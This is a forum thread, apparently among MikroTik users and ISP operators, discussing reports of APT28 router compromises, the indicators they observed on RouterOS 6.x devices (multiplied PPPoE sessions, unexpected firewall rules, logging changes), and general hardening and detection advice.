News has recently circulated that a Russian hacking group called APT28 has apparently been attacking TP-Link and Mikrotik devices for some time (see link).
Mikrotik devices seem to be the exception, but I'm still curious: how would I detect Indicators of Compromise on my Mikrotik router?
For reference:
https://mikrotik.com/supportsec/winbox-vulnerability/
https://mikrotik.com/supportsec/meris-botnet/
These are old attacks.
What we have observed happened early this morning across dozens of devices. Many of them had no service ports exposed to the internet (and in others, access was filtered via /ip services).
Observed behavior:
PPPoE clients showing 3–4 sessions per user.
If you disconnect them, they reappear with the same uptime they previously had.
Disabling the PPPoE server does not change anything.
CPU usage above 80%
Firewall rules in input chain allowing TCP connections to ports 1080, 7777, and 8888, without any prior login traces
2 supout files created
All actions under System > Logging changed to "disk"
All of this activity was detected around 03:00 AM, while the CPU load and PPPoE issues started around 05:00 AM.
After a reboot, everything appears to return to normal.
So far, all affected devices are CCR Tilera running RouterOS 6.4x.
And are still in field if router is not patched/upgraded and still runs affected versions.
It may sound surrealistic, but I’ve spotted several devices running like that in 2025
Refer to the actual ncs.gov.uk advisory:
https://www.ncsc.gov.uk/news/apt28-exploit-routers-to-enable-dns-hijacking-operations
The list of affectred router models is however TP-LINK only at the moment even if Mikrotik is cited, it seems like TP-LINK routers were hacked to conduct attacks against Mikrotik devices in Ukraine.
And it seems like affected ports are different.
We have the same indicators in many routers, which apparently do not have services exposed/open to the internet, but we have not found any change in the configuration.
Although the PPPoE server configuration is set to "one session per host", the same authenticated MAC address is seen up to 4 times.
Has anyone else noticed these behaviors?
I can confirm that several colleagues in the sector are reporting the same issue: their PPPoE servers started multiplying client sessions, exhausting the IP pools and causing service outages for users. The routers I have been able to review are properly secured, with no management ports exposed to the Internet. In all cases, the affected versions belong to the 6.x series.
I have sent the following email to support@mikrotik.com, but I am not very optimistic about receiving a response:
”Dear MikroTik Support Team,
I work as a consultant and ISP specializing in MikroTik environments. I would like to bring to your attention an incident we recently encountered which, due to its characteristics, we believe warrants further analysis.
During the early hours of the morning, around 03:00 AM, between Tuesday and Wednesday, several ISP networks across Spain began experiencing unusual behavior in their routers. These infrastructures are completely independent from one another, with no operational or network relationship, which makes the situation particularly striking.
In all cases, the affected devices were MikroTik routers running the latest stable release of the v6 branch. Suddenly, multiple additional PPPoE sessions started to appear. These sessions were not replacing existing ones; instead, they accumulated progressively, eventually exhausting the available IP address pools within each network.
It is important to note that all environments were properly secured. No inbound access was allowed, either due to strict firewall rules or because the routers were located behind upstream NAT devices with no open ports. In other words, only outbound traffic was permitted.
The only effective way to restore normal operation was to reboot the affected devices. Due to the direct impact on customer connectivity — as these are ISPs serving a significant number of subscribers — immediate action was required, which unfortunately prevented us from collecting more detailed diagnostic data. No supout.rif files were generated, and the available logs were not useful, as the logging buffer quickly became saturated with connection-related errors.
Additionally, after discussing this issue with other professionals in the sector here in Spain, we have confirmed that they have experienced the same problem in their own networks.
The fact that this behavior occurred almost simultaneously across completely independent networks leads us to suspect a possible software-related issue or an external triggering factor.
We would greatly appreciate your insight on whether similar incidents have been reported, as well as any recommendations you may have for preventing such situations or improving data collection should the issue occur again.
Please let me know if you require any additional technical details.
Thank you very much for your support”
Indeed… came across a hAP lite running a very old version just last week… more importantly, I was unable to upgrade it due to lack of memory. Fortunately, it was just been used as an internal switch so risk is hopefully low.
It may indicate attack from some infected router’s PPPoE clients - in this case setting “one session per host” should limit connections from same MAC - but question is - is there connections coming from same MAC adresses as “valid” clients or there are some other addresses?
Exposing your router management ports (ssh, telnet, webfig, winbox) to internet is a bad idea. NO, you don’t have a good reason to do that!
Strong passwords do not help you when there is a software vulnerability.
You are allowing multiple logins from the same user? Why? Configure that to be at most 2. So users can login when they powercycle the router and the previous login has not expired. But not unlimited.
You can try to look for Indicators of Compromise related to recent APT28 activity on MikroTik devices, but it’s not always straightforward. These attacks tend to be stealthy and may leave only subtle traces. Monitoring unusual login attempts, unexpected configuration changes, unfamiliar scripts, or suspicious outbound connections can help. It’s also a good idea to review logs regularly and compare them against known threat intelligence where available.
Very strange that NIST mention Mikrotik explicitly in their posting but do not refer to CVEs or IOCs nor models. And no public statement from Mikrotik.
My guess is Mikrotik has nothing to do with this unless there's some 0-day lurking around. But surely NIST should have synced their statement with Mikrotik.
Quotes from NCSC report:
A subset of servers in this cluster received DNS requests via likely compromised devices including models of MikroTik and TP-Link routers. The DNS requests were forwarded from these servers to further remote actor-owned servers.
This report draws on information derived from NCSC and industry sources
"Indistry sources"? Which ones?
Such "clickbite" news help to keep the focus on the security at proper level but on the other hand they rock the boat just for clicks. Any brand could be mentioned as "including XXX, YYY brand". Ones could wonder if such black PR is the another kind of cyber attack to make the particular brand less trustable. Especially if the manufacturer is based in the country the attacker is "interested" in.
The problem is that these vulnerabilities are by now from a decade ago, they have been patched, but not many router users ever update their RouterOS. So until all the sold routers have hardware failure, this story continues and will make the news and press releases from authorities over and over again.
What baffles me most is that even with all the countermeasures taken by MikroTik, which until recently have caused a lot of aggravation mainly for users who do automated deployment, there still has not been a solution to the problem “nobody ever updates their router”. When a vulnerability like this turns up again in current RouterOS, the issue will be exactly the same as it was 10 years ago: no way to make it go away except just wait another 15 years.
Yes, we have not found any indication that MikroTik devices are vulnerable. They are only mentioned in those reports as targets by attackers, that are scanning for outdated mikrotik versions:
Quote: "The GRU scanned the internet for TP-Link and MikroTik routers running outdated firmware"
Of course it is possible that if your device was compromised 10 years ago, and the attacker implanted some kind of "system scheduler" script, that fetches stuff from the internet, even upgrading it might not remove it (we detect most widely known scripts, but it's hard to say which script is made by user, and which by a very old attack). So better export the full config and inspect it.
Only as a side note, in the list of affected TP-LINK devices there are:
TP-LINK WIRELESS N ACCESS POINT WA801ND
TP-LINK WIRELESS N ACCESS POINT WA901ND
I am familiar with these two models and they are "pure" access points with modes: access point/range extender/client/Multi-SSID, they shouldn't be ever connected directly to the internet, so if they have been compromised, this can only have happened if the "main" router has also been compromised.
Or if the compromise happens from the local network, e.g. some trojan program (could even be java or javascript when bugs exist) that exploit a config webserver vulnerability by scanning the local network to find those devices.
But then the vector is another device (a PC, a server, a phone, whatever) that runs the trojan or java/javascript.